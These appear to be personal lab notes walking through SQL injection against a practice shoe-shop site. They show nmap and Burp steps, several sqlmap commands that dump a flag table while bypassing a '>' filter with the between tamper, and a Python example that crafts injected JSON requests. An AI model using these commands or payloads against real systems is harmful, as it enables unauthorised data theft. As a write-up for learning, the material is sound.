- Find the contents of table `final_flag`
- Ping test
![[images/Pasted image 20251210193224.png]]
- Nmap scan
![[images/Pasted image 20251210193220.png]]
- Visit the web page: a shoe web shop
![[images/Pasted image 20251210193457.png]]
- View the request and response in Burp
![[images/Pasted image 20251210193516.png]]
- `/checkout.html` appears to have a web form
![[images/Pasted image 20251210193951.png]]
- Try sqlmap here first: failure
```bash
sqlmap -u "http://83.136.251.11:49018/checkout.html" --batch
```
![[images/Pasted image 20251210193934.png]]
- Hunt for forms across the different pages with variations of the command below
```bash
sqlmap -u "http://83.136.251.11:49018/blog-single.html" --forms --crawl=1
```
- Potential forms found
```bash
GET http://83.136.251.11:49018/checkout.html?=&optradio=on
POST http://83.136.251.11:49018/shop.html
POST data: people=%23&people=%23
```
- Try adding an item to the cart from `/shop.html`: interesting pop-up
![[images/Pasted image 20251210200411.png]]
- Burp shows a POST request targeting `action.php` with an `id` parameter
![[images/Pasted image 20251210200502.png]]
- Save the POST request to a file from within Burp so it can be fed to `sqlmap` with `-r`
- Run the starter command against that file
```bash
sqlmap -r shop-post.txt
```
- Observations from the output:
	- the JSON `id` parameter appears to be dynamic
	- we know the body is JSON from the `{"key":"value"}` format of the POST request above
	- the `>` character is being filtered out by the back-end server
![[images/Pasted image 20251210201411.png]]
- Try a more targeted command against the specified table:
	- add an explicit `--data` field carrying the JSON payload
	- add a tamper script to bypass the `>` filtering noted above (`between` rewrites `a > b` as `a NOT BETWEEN 0 AND b`, so no `>` reaches the filter)
```bash
sqlmap -r shop-post.txt --method POST --data '{"id":"1"}' --batch --dump --tamper=between -T final_flag
```
![[images/Pasted image 20251210202030.png]]
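Added example (not part of the original notes, and not sqlmap's own code) showing why the last step works: a saved request file like `shop-post.txt` is parsed, a boolean test payload is appended to the JSON `id` value the way sqlmap does, and a simplified reimplementation of the idea behind the `between` tamper rewrites `>` so the payload survives a back end that strips that character. The request text, the `backend_filter` model and the `between_tamper` regexes are assumptions for illustration; the real tamper script and the real server are more elaborate.

```python
import json
import re

# Constructed stand-in for the request saved from Burp as shop-post.txt
# (not the original capture): same host and JSON body as in the write-up.
SAMPLE_REQUEST = """POST /action.php HTTP/1.1
Host: 83.136.251.11:49018
Content-Type: application/json
Content-Length: 10

{"id":"1"}
"""


def parse_request(raw):
    """Split a saved HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, path, headers, body.strip()


def inject_json(body, key, payload):
    """Append an injection payload to the value of `key` in a JSON body,
    mirroring how sqlmap appends test payloads to the original value."""
    obj = json.loads(body)
    obj[key] = str(obj[key]) + payload
    return json.dumps(obj, separators=(",", ":"))


def between_tamper(payload):
    """Simplified version of the idea behind sqlmap's `between` tamper
    (assumption: the real script uses more elaborate regexes):
      a > b  ->  a NOT BETWEEN 0 AND b
      a = b  ->  a BETWEEN b AND b      (only if no `>` was rewritten)"""
    out = re.sub(r"\s*>\s*(\d+|'[^']*')", r" NOT BETWEEN 0 AND \1", payload)
    if out == payload:
        out = re.sub(r"\s*=\s*(\d+|'[^']*')", r" BETWEEN \1 AND \1", payload)
    return out


def backend_filter(text):
    """Model of the filter observed in the lab: every '>' is dropped.
    (Assumption: the real back end may do more than this.)"""
    return text.replace(">", "")


def build_request(method, path, headers, body):
    """Reassemble the request with a Content-Length matching the new body."""
    hdrs = dict(headers)
    hdrs["Content-Length"] = str(len(body.encode()))
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def craft(raw_request, payload, tamper=None):
    """Return (body as the server sees it after its filter, full request sent)."""
    method, path, headers, body = parse_request(raw_request)
    if tamper:
        payload = tamper(payload)
    new_body = inject_json(body, "id", payload)
    return backend_filter(new_body), build_request(method, path, headers, new_body)


if __name__ == "__main__":
    probe = " AND 2>1"  # boolean-based "true" condition
    plain, _ = craft(SAMPLE_REQUEST, probe)
    tampered, req = craft(SAMPLE_REQUEST, probe, between_tamper)
    print("no tamper, server sees:     ", plain)     # condition mangled to "2 AND 21"
    print("between tamper, server sees:", tampered)  # condition intact
    print(req)
```

Without the tamper the stripped body becomes `{"id":"1 AND 21"}`, so the true/false probes sqlmap relies on for boolean-based detection no longer differ in the intended way; with the rewrite the comparison reaches the database untouched, which is why `--tamper=between` is the right fix for this filter rather than a generic encoding tamper.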